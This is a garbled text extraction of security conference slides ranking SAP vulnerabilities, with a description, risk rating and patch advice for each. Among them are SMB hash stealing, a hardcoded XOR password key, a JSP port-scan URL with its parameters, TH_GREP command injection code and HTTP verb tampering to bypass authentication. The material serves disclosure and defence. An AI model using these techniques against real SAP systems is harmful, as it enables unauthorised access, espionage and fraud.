1543318
and
1469549
25
26. Author: Dmitry Chastukhin (ERPScan)
8
–
BAPI
script
injec>on/hash
stealing
:
Descrip>on
• SAP
BAPI
transacHon
fails
to
properly
saniHze
input
• Possible
to
inject
JavaScript
code
or
link
to
a
fake
SMB
server
• SAP
GUI
clients
use
Windows
so
their
credenHals
will
be
transferred
to
a[ackers
host.
26
27. New
8
–
BAPI
script
injec>on/hash
stealing:
Demo
27
28. Ease
of
exploita>on
–
Low
Sabotage
–
High
Espionage
–
High
Fraud
–
High
8
–
BAPI
script
injec>on/hash
stealing:
Business
risks
28
29. 7
–
SAP
GUI
bad
encryp>on:
Descrip>on
• SAP
• SAP
FrontEnd
can
save
encrypted
passwords
in
shortcuts
• Shortcuts
stored
in
.sap
file
• This
password
uses
byte-‐XOR
algorithm
with
“secret”
key
• Key
has
the
same
value
for
every
installaHon
of
SAP
GUI
• Any
password
can
be
decrypted
in
1
second
Author:Author: Alexey Sintsov (ERPScan
New
31. 7
–
SAP
GUI
bad
encryp>on:
Business
risks
Sabotage
–
Medium
Fraud
–
High
Espionage
–
High
Ease
of
exploita>on
–
Medium
31
32. 7
–
SAP
GUI
bad
encryp>on:
Preven>on
•
Disable
password
storage
in
GUI
32
33. 6
–
Remote
port
scan
via
JSP:
Descrip>on
•
It
is
possible
to
scan
internal
network
from
the
Internet
•
Authen>ca>on
is
not
required
•
SAP
NetWeaver
J2EE
engine
is
vulnerable
• /ipcpricing/ui/BufferOverview.jsp?
• server=172.16.0.13
• &
port=31337
• &
password=
• &
dispatcher=
• &
targetClient=
• &
view=
Author: Alexander Polyakov (ERPScan)
33
34. 6
–
Remote
port
scan
via
JSP:
Demo
Port
closed
HTTP
port
SAP
port
34
35. 6
–
Remote
port
scan
via
JSP:
Business
risks
Ease
of
exploita>on
–
High
Espionage
–
Medium
Fraud
–
No
Sabotage
–
Low
35
36. 6
–
Remote
port
scan
via
JSP:
Preven>on
•
Install
SAP
notes:
1548548,
1545883,
1503856,
948851,
1545883
•
Disable
unnecessary
applicaHons
36
37. 5
–
MMC
JSESSIONID
stealing:
Descrip>on
• Remote
management
of
SAP
Plaworm
• By
default,
many
commands
go
without
auth
• Exploits
implemented
in
Metasploit
(by
ChrisJohnRiley)
• Most
of
the
bugs
are
informaHon
disclosure
• It
is
possible
to
find
informaHon
about
JSESSIONID
• Only
if
trace
is
ON
Can
be
authen>cated
as
an
exis>ng
user
remotely
1) Original bug by ChrisJohnRiley
2) JSESSIONID by Alexey Sintsov and
Alexey Tyurin (ERPScan)
New
37
39. 5
–
MMC
JSESSIONID
stealing:
Business
risks
Espionage
–
Cri>cal
Sabotage
–
Medium
Fraud
–
High
Ease
of
exploita>on
–
Medium
39
40. 5
–
MMC
JSESSIONID
stealing:
Preven>on
• The
JSESSIONID
by
default
will
not
be
logged
in
log
file
• Don’t
use
TRACE_LEVEL
=
3
on
producHon
systems
or
delete
traces
ajer
use
• Other
info
h[p://help.sap.com/saphelp_nwpi71/helpdata/
en/d6/49543b1e49bc1fe10000000a114084/frameset.htm
40
41. • RCE
vulnerability
in
RFC
module
TH_GREP
• Found
by
Joris
van
de
Vis
• SAP
was
not
properly
patched
(1433101)
• We
have
discovered
that
the
patch
can
be
bypassed
in
Windows
Origina
l
bug
by
Joris
van
de
Vis
(erp-‐sec)
Bypass
by
Alexey
Tyurin
(ERPScan)
4
–
Remote
command
execu>on
in
TH_GREP:
Descrip>on
41
42. 4
–
RCE
in
TH_GREP:
Details
elseif opsys = 'Windows NT'.
concatenate '/c:"' string '"' filename into
grep_params in character mode.
else. /*if linux*/
/* 185 */ replace all occurrences of '''' in
local_string with '''"''"'''.
/* 186 */ concatenate '''' local_string ''''
filename into grep_params
/* 187*/ in character mode.
/* 188*/ endif.
/* 188*/
42
44. 4
-‐
RCE
in
TH_GREP:
More
details
4
ways
to
execute
vulnerable
program
• Using
transacHon
"Se37“
• Using
transacHon
“SM51“
(thanks
to
Felix
Granados)
• Using
remote
RFC
call
"TH_GREP"
• Using
SOAP
RFC
call
"TH_GREP"
via
web
44
46. 4
–
RCE
in
TH_GREP:
Business
risks
Sabotage
–
Medium
Fraud
–
High
Espionage
–
High
Ease
of
exploita>on
–
medium
46
47. 4
–
RFC
in
TH_GREP:
Preven>on
•
Install
SAP
notes
1580017,
1433101
•
Prevent
access
to
criHcal
transacHons
and
RFC
funcHons
•
Check
the
ABAP
code
of
your
Z-‐transacHons
for
similar
vulnerabiliHes
47
48. 3
-‐
ABAP
Kernel
BOF:
Descrip>on
• Presented
by
Andreas
Wiegenstein
at
BlackHat
EU
2011
• Buffer
overflow
in
SAP
kernel
funcHon
C_SAPGPARAM
•
When
NAME
field
is
more
than
108
chars
• Can
be
exploited
by
calling
an
FM
which
uses
C_SAPGPARAM
• Example
of
report
–
RSPO_R_SAPGPARAM
Author: (VirtualForge)
48
50. 3
–
ABAP
Kernel
BOF:
Business
risks
Ease
of
exploita>on
–
Medium
Espionage
–
Cri>cal
Fraud
–
Cri>cal
Sabotage
–
Cri>cal
50
51. 3
–
ABAP
Kernel
BOF:
Preven>on
•
Install
SAP
notes:
- 1493516
–
CorrecHng
buffer
overflow
in
ABAP
system
call
- 1487330
–
PotenHal
remote
code
execuHon
in
SAP
Kernel
•
Prevent
access
to
criHcal
transacHons
and
RFC
funcHons
•
Check
the
ABAP
code
of
your
Z-‐transacHons
for
criHcal
calls
51
52. 2
–
Invoker
Servlet:
Descrip>on
• Rapidly
calls
servlets
by
their
class
name
• Published
by
SAP
in
their
security
guides
• Possible
to
call
any
servlet
from
the
applicaHon
• Even
if
it
is
not
declared
in
WEB.XML
Can
be
used
for
auth
bypass
52
54. 2
–
Invoker
servlet:
Business
risks
Ease
of
use
–
Very
easy!
Espionage
–
High
Sabotage
–
High
Fraud
–
High
54
55. 2
-‐
Invoker
servlet:
Preven>on
• Update
to
the
latest
patch
1467771,
1445998
• “EnableInvokerServletGlobally”
property
of
the
servlet_jsp
must
be
“false”
If
you
can’t
install
patches
for
some
reason,
you
can
check
all
WEB.XML
files
using
ERPScan
web.xml
scanner
manually.
55
57. 1st
Place
–
Verb
Tampering
<security-constraint>
<web-resource-collection>
<web-resource-name>Restrictedaccess</web-resource-
name>
<url-pattern>/admin/*</url-pattern>
<http-method>GET</http-method>
</web-resource-collection>
<auth-constraint>
<role-name>admin</role-name>
</auth-constraint>
</security-constraint>
What
if
we
use
HEAD
instead
of
GET
?
Author: Alexander Polyakov (ERPScan)
57
58. 1st
Place
–
Verb
tampering:
Details
Remotely
without
authen>ca>on!
• CTC
–
Secret
interface
for
managing
J2EE
engine
• Can
be
accessed
remotely
• Can
run
user
management
acHons:
– Add
users
– Add
to
groups
– Run
OS
commands
– Start/Stop
J2EE
58
60. 1
–
Verb
tampering:
More
details
If
patched,
can
be
bypassed
by
the
Invoker
servlet!
60
61. 1
–
Verb
tampering:
Business
risks
Espionage
–
Cri>cal
Sabotage
–
Cri>cal
Fraud
–
Cri>cal
Ease
of
use
–
Very
easy!
61
62. PrevenHon:
• Install
SAP
notes
1503579,1616259
• Install
other
SAP
notes
about
Verb
Tampering
(about
18)
• Scan
applicaHons
using
ERPScan
WEB.XML
check
tool
or
manually
• Secure
WEB.XML
by
deleHng
all
<h[p-‐method>
• Disable
the
applicaHons
that
are
not
necessary
1st
Place
–
Verb
tampering:
Preven>on
62
63. Conclusion
It
is
possible
to
be
protected
from
almost
all
those
kinds
of
issues
and
we
are
working
hard
with
SAP
to
make
it
secure
SAP
Guides
It’s
all
in
your
hands
Regular
Security
assessments
ABAP
Code
review
Monitoring
technical
security
Segrega>on
of
Du>es
63
64. Future
work
Many
of
the
researched
things
cannot
be
disclosed
now
because
of
our
good
relaHonship
with
SAP
Security
Response
Team,
whom
I
would
like
to
thank
for
cooperaHon.
However,
if
you
want
to
see
new
demos
and
0-‐days,
follow
us
at
@erpscan
and
a[end
the
future
presentaHons:
• Just4MeeHng
in
July
(Portugal)
• BlackHat
USA
in
July
(Las
Vegas)
64
65. Greetz
to
our
crew
who
helped:
Dmitriy
Evdokimov,
Alexey
Sintsov,
Alexey
Tyurin,
Pavel
Kuzmin,
Evgeniy
Neelov.
65